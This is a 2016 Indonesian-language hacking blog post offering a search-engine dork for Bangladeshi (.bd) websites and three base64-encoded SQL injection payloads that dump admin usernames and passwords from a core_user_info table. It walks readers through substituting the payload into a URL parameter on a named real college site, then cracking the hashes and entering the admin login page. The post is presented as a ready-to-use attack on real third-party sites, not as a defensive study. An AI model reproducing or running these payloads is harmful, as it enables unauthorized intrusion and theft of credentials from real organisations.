Tuesday, December 27, 2016

Exploit web Banglades ( BD )

Kali ini saya ingin berbagi salah satu dork dan exploit untuk website banglades ( bd ).
Mungkin kalo sudah baca artikel saya tentang SQLI Base64 mungkin tau cara kerja exploit yang saya buat ini.

oke langsung saja ke intinya :

Dork     :  inurl : facilities.php?id=MQ== site:bd ( Kembangkan Sendiri supaya dapet banyak perawan )

Exploit   :
  1. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0IC0tIA==
  2. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExIC0tIA==
  3. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5IC0tIA== 
Menu Login admin : /login_slide.php

Oke di situ terdapat 3 exploit, terus bagaimana cara penggunaanya ?
simak baik - baik ya langkah demi langkahnya supaya mengerti .

Hasil dari dork inurl : facilities.php?id=MQ== site:bd
 

Untuk dork bisa di kembangkan sendiri yah :D

Jika sudah memasukan dorknya silakan pilih salah satu webnya.
Di sini saya pilih web http://www.dhakacollege.edu.bd/facilities.php?id=MQ== Sebagai target dan Contohnya.
 


Jika Sudah memilih webnya anda tinggal masukan exploitnya saja.

Bagaimana cara masukan exploitnya ?
yaitu anda tinggal mengganti tulisan
MQ== dengan exploitnya. Misalnya anda menggunakan exploit nomer 1 gagal anda bisa menggunakan exploit nomer 2 atau 3. Perhatikan gambar berikut :




Nah lihat hasilnya muncul lah user dan passwordnya, anda tinggal men - cracknya saja.
Dan masuk kemenu adminya :D


oke sekian exploit sederhana yang saya buat ini :D


untuk yang ingin bertana - bertanya seputar artikel yang saya buat bisa chat saya langsung .



No comments:

Post a Comment

 
Cool Blue Outer Glow Pointer